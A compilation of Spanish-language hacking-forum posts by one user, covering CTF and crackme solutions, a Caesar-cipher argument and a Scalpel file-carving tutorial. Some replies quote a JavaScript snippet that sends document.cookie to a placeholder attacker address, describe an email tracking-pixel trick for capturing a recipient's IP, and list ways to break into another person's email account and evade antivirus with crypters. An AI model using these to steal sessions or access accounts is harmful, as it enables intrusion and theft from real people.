Apunto el mío:
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Un poco tardío pero dejo las soluciones por si a alguien le interesa.

Aquí el primero resuelto.



En el segundo reto si observamos la imagen con un editor hexadecimal al final del archivo veremos un texto en base64.

OWsxMzMyNThmZWFmZmRjZGQ0ZTEzYmYwNTQxYmJhMTEw

Si hacemos decode en base64 nos dará lo que parece un hash:
9k133258feaffdcdd4e13bf0541bba110

Habitualmente los hashes solo tienen caracteres hexadecimales, así que probaremos a crackearlo si la k.



Saludos

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
El problema de concepto es tuyo, si tu tienes la primera letra, que sin cifrar es una 'l', y le aplicas una clave 5 el resultado es una 'p', como decía el reto.

l -> m -> n -> ñ -> o -> p
  1      2      3     4      5 

Si lo haces de la forma inversa, que es como se debería hacer para descifrar, la clave que se utilizaría será la 5 y llegaríamos al mismo resultado.

p -> o -> ñ -> n -> m -> l
   1     2      3     4       5

La cuestión es que tu al usar la clave 22, das la vuelta al diccionario y vuelves al texto descifrad. (22+5 = 27).

Espero que se haya entendido.

Saludos.

Perdón pero sigo sin entender, a ver en tu ejemplo entonces esta bien estás CIFRANDO con ROT5, pero no se puede DESCIFRAR con ROT (-5), lo dice claramente en la wiki que siempre vas hacia adelante en el alfabeto, por lo que utilizas el 22.

Y en el reto se pedía descifrar por lo que 22 sería el numero acertado, (-5) no está en las posibilidades, y hablar que se descifro con ROT5 no sería correcto.

Saludos y espero se entienda mi punto de vista! Y no ofenda a nadie obvio, todos tratamos de quitarnos la duda!

La cuestión es que tu punto de vista no está bien, en cifrado cesar se cifra y se descifra con la misma clave, solo que al descifrar se hace de la manera inversa.

Saludos.

El problema de concepto es tuyo, si tu tienes la primera letra, que sin cifrar es una 'l', y le aplicas una clave 5 el resultado es una 'p', como decía el reto.

l -> m -> n -> ñ -> o -> p
  1      2      3     4      5 

Si lo haces de la forma inversa, que es como se debería hacer para descifrar, la clave que se utilizaría será la 5 y llegaríamos al mismo resultado.

p -> o -> ñ -> n -> m -> l
   1     2      3     4       5

La cuestión es que tu al usar la clave 22, das la vuelta al diccionario y vuelves al texto descifrad. (22+5 = 27).

Espero que se haya entendido.

Saludos.

Pues yo soy es Español, al sur tocando ya con costa.
Y llevo en el foro desde 2013, unos años muy bonitos.

Muy buenas Underc0ders,

en el día de hoy vamos a ver como consistiría el proceso de recuperación de información cuando se ha borrado información de nuestra máquina que no queríamos perder.


En primer lugar me gustaría dar créditos a You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login ya que descubrí esta herramienta en el taller que dio sobre análisis de ransomware en Qurtuba donde dio algo de información sobre esto..

Primero que nada veamos un poco de teoría. La herramienta que vamos a ver hoy usa una técnica llamada File Carving.
Cuando nosotros borramos algún archivo en realidad no lo estamos borrando, lo que ocurre es que le estamos diciendo al disco que esos segmentos están vacíos, la técnica de la que estamos hablando lo que haría sería buscar en todos los segmentos que se suponen vacíos para ver si ahí hay algo de información.


Una vez entendido lo que vamos a hacer, podemos pasar a la práctica, lo primero que vamos a hacer será descargar las dos siguientes herramientas:

FTK: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Scalpel: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Scalpel es una herramienta que se puede utilizar tanto en linux como en windows, la única diferencia es que en Windows no puede analizar el disco, si no que tiene que analizar una imagen del disco, de ahí que vayamos a usar FTK para conseguir esta imagen.

En mi caso voy a sacar la información de un pendrive de dos GB (para que la imagen del disco no pese mucho), donde he metido y mas tarde eliminado unas imágenes.


Lo primero que vamos a hacer es pulsar el botón de "add evidence item" y elegiremos "Logical Drive".



Elegimos el Disco, en mi caso el F:


Daremos click derecho al disco y pulsaremos "Export Disk Image".


Configuramos donde y como queremos que se guarde la imagen.


Una vez hecho esto y presionado start empezará a crear la imagen.




Una vez hecho esto ya podemos proceder a buscar la información, lo primero que vamos a hacer es comprobar como funciona este programa, para ello vamos a hacer: "scalpel -h"


Lo primero que queda claro es que la sintaxis es: scalpel -opcion1 - opcion2 imagen

Las opciones más interesantes son las siguientes:

-c : Sirve para elegir el archivo de configuración. (de serie es scalpel.conf)

-o : Sirve para elegir la carpeta donde se mandará la información. (de serie es scalpel-output)

-v : Sirve para entrar en el verbose mode.


En el archivo de configuración predeterminado trae muchas opciones para buscar gran cantidad de ficheros diferentes, solo tendríamos que ir a dicha sección y borrar '#' para que dejase de ser un comentario.


Para añadir una nueva regla sería de la siguiente forma:

'extension' y 'tamaño' 'header' 'EOF'

Pueden buscar el header y el EOF de cada tipo de archivo por internet, yo haré un archivo de configuración que saque todas las imagenes.


Y lanzamos el programa hacia la imagen: scalpel -o outputDrive -c configuracio.conf "C:\Users\xxxx\Desktop\xxxx\xxxx\ImagenDisco\imagen.002"

Una vez lanzado empezará a buscar estos archivos y nos los meterá en la carpeta que le hemos dicho.


En la carpeta que hemos pasado como parámetro habrá varias carpetas con los diferentes archivos que habrá recuperado, y por fin hemos encontrado aquello que andáramos buscando.



Espero que les sea de utilidad.

También me pueden seguir en Twitter si les hace ilusión: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Saludos.

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Pero, a mi entender la mayoría de programas de correo así como visores mail no deberían dejan ver las imágenes que no vienen adjuntas. ¿En que correos lo habéis probado y funciona de modo satisfactorio?
Me refiero, si esto funcionase, por regla general, en lugar de coger la IP me sale mas a cuenta embeber un javascript y que me envíe las cookies como variable get con un document.cookie y así puedo entrar en el correo directamente en el correo en lugar de tener su IP. Vaya que me parece información mas relevante.

algo así como:

<img id="lalala" src=""></img>
<script> document.getElementByID('lalala').src='http://mideireccionIP/lala.php?var='+document.cookie </script>

El código está sin comprobar pero creo que se ve la idea.

La verdad no veo por donde vas, para que se ejecutase el script el servicio de correo tendría que ser vulnerable a XSS, en el caso que yo he expuesto no hace falta.

He enviado el email desde un gmail hasta un gmail, se ha cargado la foto normal y no lo ha enviado a spam, asi que no, se pueden enviar fotos no adjuntas con etiquetas HTML, de hecho los emails se envían en HTML, lo unico que he hecho ha sido imitar una CSRF haciendo que su navegador llame a mi PHP y me mande los datos

Saludos.

A lo que se refiere animanegra según entiendo, es a que independientemente del código que introduzcas, el método que estás usando debería ser filtrado por los gestores de correos, aunque no sea un XSS. En resumen, si estás obteniendo el IP, podrías también obtener las cookies de sesión...De todas maneras, habrá que probarlo.

Los emails se basan en etiquetas HTML, cuando tu intentas enviar una XSS se filtra esa etiqueta, estan los filtros específicos, sin embargo como entenderás la etiqueta <img> no está filtrada, el obtener la IP es como si fuera un SCRF más que una XSS, pruebalo a ver si entiendes mejor el concepto, pero ya te digo que es funcional y que no tiene nada que ver con una XSS.

Cualquier duda más o fallo que tengas en caso de que lo repliques no dudes en preguntar.

Saludos.

Un keylogger lo puedes programar en cualquier lenguaje de programación, de hecho hay varios ejemplos en cada lenguaje en sus respectivas secciones, hace no mucho yo programé uno en C.

Saludos.

No he entendido bien la pregunta, en qué lenguaje quieres hacerlo?
O es para que salga siempre?
Por que otros caracteres quieres que se modifique?

No se si esto llega a ser una duda o simplemente un offtopic para debatir sobre el tema.
Sinceramente no estoy de acuerdo, me parece que en linux no es nada complicado instalar cualquier aplicación, si no que además en muchas ocasiones se hace mucho más fácil que en windows.

Saludos.

La solución del 4 y último juego es de los más sencilla, solo hay que echarle un buen ojo a la foto y veremos lo siguiente.



Vemos que pone flag:Under--C0d3

Con los 3 retos que completó @You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login y este quedan todos solucionados.

Saludos.

Puedes mirar la sección correspondiente del foro, hay una cantidad de información increíble sobre el tema.
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Además tienes este post donde recopilo información sobre documentación de c/c++.
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Puedes empezar a mirar por ahí.

Muy buenas Underc0ders.

Hoy me gustaría dar unos tips para resolver el crackme que se propuso para el You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login.
También aconsejo leer este post sobre resolución de Crackme's: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Primero vamos a descargar PEview, el cual podemos encontrar en este link: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Este software nos permite ver la estructura y el contenido de ejecutables de 32 bits.

Aquí podremos encontrar varias secciones (.idata .rdata .rsrc), en este caso nos interesaremos por la sección .text, la cual nos entrega la información de las instrucciones de nuestro ejecutable.

Aquí podremos encontrar algo de información que nos resultará interesante.



De aquí obtenemos que el ejecutable  se ha programado con Visual Basic, además de unos datos que probaremos como usuario y contraseña.



Dice que para acabar el reto tendremos que hashear nuestro nick en Sha1, y nos da un link, en mi caso el resultado sería
6a9fe8a92da14c7dc12c865e8459e416fe500958

Es algo corto ya que el reto era sencillito pero espero que pueda servir.

También me pueden seguir en Twitter si les hace ilusión: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Saludos.

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Ese tutorial de como crear uno manualmente, creo que te será más útil.

Puede que los archivos no se creen por tema de permisos, prueba a hacer "chmod 777 ./directorio"

PD: Ya nadie se cree que este tipo de cosas sean para un tfg o trabajo de clase, con que preguntes como las personas normales basta, no hace falta poner excusas baratas.

Saludos

Gracias por el enlace, y no es excusa, es proyecto real, pero lo veo muy complicado... no se donde me falla y no se por donde atajarlo!
Saludos

Probaste lo que yo te dije de modificar los permisos?

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Ese tutorial de como crear uno manualmente, creo que te será más útil.

Puede que los archivos no se creen por tema de permisos, prueba a hacer "chmod 777 ./directorio"

PD: Ya nadie se cree que este tipo de cosas sean para un tfg o trabajo de clase, con que preguntes como las personas normales basta, no hace falta poner excusas baratas.

Saludos

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Hola, para eso tienes que editar el registro de windows, suponiendo que trabajes sobre el.
esto a sido lo primero que he encontrado, si buscas problablemente encuentres más.

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

saludos

Además tienes la carpeta "C:\Users\usuario\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup" en el cual se inicia todo lo que haya dentro, puedes crear un .bat que inicie tu código de python.

Puedes encontrar esa carpenta pulsado Windows+R y escribeindo shell:startup.

Saludos.

Tal vez a uno le salta la alerta y al otro no porque a pesar de estar en el código fuente, el enlace está caído y no se puede cargar el javascript.

Saludos.

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
he ejecutado Hydra con un diccionario creado en Crunch y da el mensaje que ha encontrado una palabra que conincide, pero no es el password correcto, como hago para que Hydra encuentre el correcto?

Si te da un falso positivo es que no lo has configurado bien

Respecto a la primera pregunta, hay troyanos más estables que otros, pero no con tanta diferencia como para que haya uno que sobresalga sobre los demás, eso depende de el gusto de cada persona.

Las descargas de la DB de Underc0de están en un principio limpias, en su momento se analizaron, pero no fueron codeados por nosotros, si quieres algo 100% limpio hay códigos que puedes comprobar y compilar tu mismo.

Los crypters públicos no sirven, primero porque se queman muy rapido y segundo porque ya no se hacen, tendrías que irte a crypter privados, además aunque digan que son 100% indetectables no lo son, ya que los antivirus además de usar blacklists para detectar usan otras técnicas como la heurística.

Saludos.

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
a lo que me refiero es cuando no recuerdas o ya no tienes esos medios de recuperacion, cambiaste de numero telefonico o no tieneas acceso a la cuenta de correo alternativa, etc.

Siempre puedes mirar a ver si ha habido un leak de la cuenta y buscar por google, si no, no hay manera mágica de obtener una contraseña

Entiendo que no es por magia que se recupera la contraseña, ese es motivo por el que consulto de que manera se logra ingresar a una cuenta de correo

Te explico a grandes rasgos las principales formas que hay de acceder a una cuenta ajena:

1º Ingeniería social, esto incluye todo tipo de engaños, es la más típica y se podrían englobar el phishing, el malware o incluso sacar la contraseña a partir de información que hayamos recopilado de la victima.

2º Leaks, lo que mucha gente hace es buscar en google si la contraseña se ha filtrado ya, en ese caso si esta en un pastebin ya la tienes, o en otro caso si está en una base de datos filtrada la descargas y crackeas la contraseña.

3º MITM, todas las técnicas relacionado con esto, ya sea un sesion hijacking a través de los cookies o robando los datos de inicio de sesión cuando usa HTTP o usando SSLTrip.

4º Fuerza bruta, en caso de que el lugar donde quieras vulnerar no tenga protección agarras un diccionario y lanzas un ataque.

5º Doxeando e intentando obtener la cuenta con la opción de recuperar contraseña y la información que obtuviste,

6º Con una vulnerabilidad, ya sea XSS, SQLi, etc.

Ya de ahí respecto al punto de partida se toman las acciones que hagan falta, tu nos pones en un caso en el que el margen de acción es extremadamente pequeño.

Saludos.